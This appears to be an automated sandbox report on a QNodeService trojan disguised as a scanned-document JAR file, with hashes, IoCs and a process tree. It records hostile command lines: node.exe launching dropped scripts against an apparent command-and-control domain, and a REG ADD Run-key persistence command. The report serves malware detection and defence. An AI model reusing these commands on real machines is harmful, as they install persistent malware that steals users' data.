Analysis

- max time kernel: 128s
- max time network: 146s
- platform: windows10_x64
- resource: win10
- submitted: 27-10-2020 12:49

Static task: static1

Behavioral task: behavioral1
- Sample: Scanned from a Xerox Multifunction Printer.jar
- Resource: win7

Behavioral task: behavioral2
- Sample: Scanned from a Xerox Multifunction Printer.jar
- Resource: win10
General

- Target: Scanned from a Xerox Multifunction Printer.jar
- Size: 79KB
- MD5: 7dba8420e5d72c58298108bb85e0eb96
- SHA1: 0f54ab5e95fa9639b1262ef8b39d2e2d49d6e467
- SHA256: 712889ab26a68bc90c620870eb8e3f5be8f46cdde742ebc63d6e891ca63b04a5
- SHA512: 6f7db07f9332cd77a07a857ea88de507ff8243f6c11f267a3b7a7b07ab9c42775db05dc1f6f12e7c367f92ce43adc5ff2927f940a6580f52e5420402c1bc93ae
Malware Config

Signatures

- QNodeService
  Trojan/stealer written in NodeJS and spread via Java downloader.

- Executes dropped EXE (3 IoCs)
  pid   Process
  2696  node.exe
  3612  node.exe
  2332  node.exe

- Adds Run key to start application (2 TTPs, 2 IoCs)
  description      ioc                                                                                           Process
  Key created      \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run   reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\ec0e0a3c-9e6a-4c19-83b8-24e3d1f9200c = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""   reg.exe

- JavaScript code in executable (3 IoCs)
  resource                                      yara_rule
  behavioral2/files/0x000100000001ab66-173.dat  js
  behavioral2/files/0x000100000001ab66-177.dat  js
  behavioral2/files/0x000100000001ab66-181.dat  js

- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  27    wtfismyip.com
  28    wtfismyip.com

- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                          Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  node.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                      node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz                 node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString  node.exe

- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid   Process   entries
  2696  node.exe  4
  3612  node.exe  4
  2332  node.exe  10

- Suspicious use of WriteProcessMemory (12 IoCs; each row was recorded twice)
  description                       pid   Process    procid_target
  PID 3996 wrote to memory of 2212  3996  java.exe   75
  PID 2212 wrote to memory of 2696  2212  javaw.exe  79
  PID 2696 wrote to memory of 3612  2696  node.exe   81
  PID 3612 wrote to memory of 2332  3612  node.exe   82
  PID 2332 wrote to memory of 3136  2332  node.exe   84
  PID 3136 wrote to memory of 296   3136  cmd.exe    85
Processes

Process tree (the bracketed number is the nesting depth; each entry is a child of the one above it).

[1] C:\ProgramData\Oracle\Java\javapath\java.exe
    Command: java -jar "C:\Users\Admin\AppData\Local\Temp\Scanned from a Xerox Multifunction Printer.jar"
    PID: 3996
    - Suspicious use of WriteProcessMemory

[2] C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
    Command: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\06818f60.tmp
    PID: 2212
    - Suspicious use of WriteProcessMemory

[3] C:\Users\Admin\node-v14.12.0-win-x64\node.exe
    Command: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain karimrnosa2.home-webserver.de
    PID: 2696
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

[4] C:\Users\Admin\node-v14.12.0-win-x64\node.exe
    Command: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Dr9vwb\boot.js --hub-domain karimrnosa2.home-webserver.de
    PID: 3612
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

[5] C:\Users\Admin\node-v14.12.0-win-x64\node.exe
    Command: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_Dr9vwb\boot.js --hub-domain karimrnosa2.home-webserver.de
    PID: 2332
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

[6] C:\Windows\system32\cmd.exe
    Command: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "ec0e0a3c-9e6a-4c19-83b8-24e3d1f9200c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
    PID: 3136
    - Suspicious use of WriteProcessMemory

[7] C:\Windows\system32\reg.exe
    Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "ec0e0a3c-9e6a-4c19-83b8-24e3d1f9200c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
    PID: 296
    - Adds Run key to start application